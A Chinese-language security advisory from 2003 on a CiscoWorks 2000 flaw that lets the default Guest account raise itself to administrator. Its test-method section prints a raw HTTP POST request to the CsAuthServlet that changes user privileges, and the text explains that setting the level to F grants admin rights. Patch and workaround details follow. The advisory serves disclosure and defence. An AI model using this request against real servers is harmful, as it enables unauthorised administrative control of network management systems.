信息提供: | 安全公告(或线索)提供热线:51cto.editor@gmail.com |
漏洞类别: | 设计错误 |
攻击类型: | 本地越权访问 |
发布日期: | 2003-08-13 |
更新日期: | 2003-08-15 |
受影响系统: | Cisco CiscoWorks 2000 |
安全系统: | 无 |
漏洞报告人: | Portcullis Security Advisory (Omicron@portcullis-security.com) |
漏洞描述: | CiscoWorks 2000是一款Cisco发布的综合网络管理系列产品。 CiscoWorks 2000不正确处理用户提交的特殊URL,远程攻击者可以利用这个漏洞获得管理员权限访问CiscoWorks 2000服务器。 Portcullis发现使用默认没有设置密码的Guest帐户,可以提升Guest用户的权限为管理员权限。当提交更改用户帐户时,HTML会在下面的字符串中显示用户信息: cmd=modifyUser&name=guest&pwd=cGFzc3dvcmQ%3D&email=test%0test.com&ccoId=&ccoPwd=&proxyId=&proxyPwd=&priviledges=0 从下面信息可以获得更改用户权限级别是从0到F之间,而F是管理员权限的代码。因此攻击者可以提交特殊的POST请求,获得管理员权限,完成一些如调度控制,软件升级,增加或删除设备,增加或删除帐户的管理员操作。 |
测试方法: | 警 告 POST /CSCOnm/servlet/com.cisco.nm.cmf.servlet.CsAuthServlet HTTP/1.0 Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: 10.10.10.1:1741 Content-Length: 114 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: jrunsessionid=1057059156201223367 cmd=modifyUser&name=guest&pwd=&email=&ccoId=&ccoPwd=&proxyId=&proxyPwd=&priviledges=0 |
解决方法: | 临时解决方法: 如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁: * 管理Guest用户帐户,并限制只有可信用户能访问CiscoWorks服务器。 厂商补丁: Cisco ----- Cisco已经为此发布了一个安全公告(cisco-sa-20030813-cmf)以及相应补丁: cisco-sa-20030813-cmf:CiscoWorks Application Vulnerabilities 链接:http://www.cisco.com/warp/public/707/cisco-sa-20030813-cmf.shtml 所有漏洞在CiscoWorks Common Services 2.2中已经得到解决。 CMF 2.0和2.1的补丁在2003 8月底公布。 您可以从Cisco网站的软件中心下载升级程序: http://tools.cisco.com/gct/Upgrade/jsp/index.jsp(只限注册用户) |
相关文章
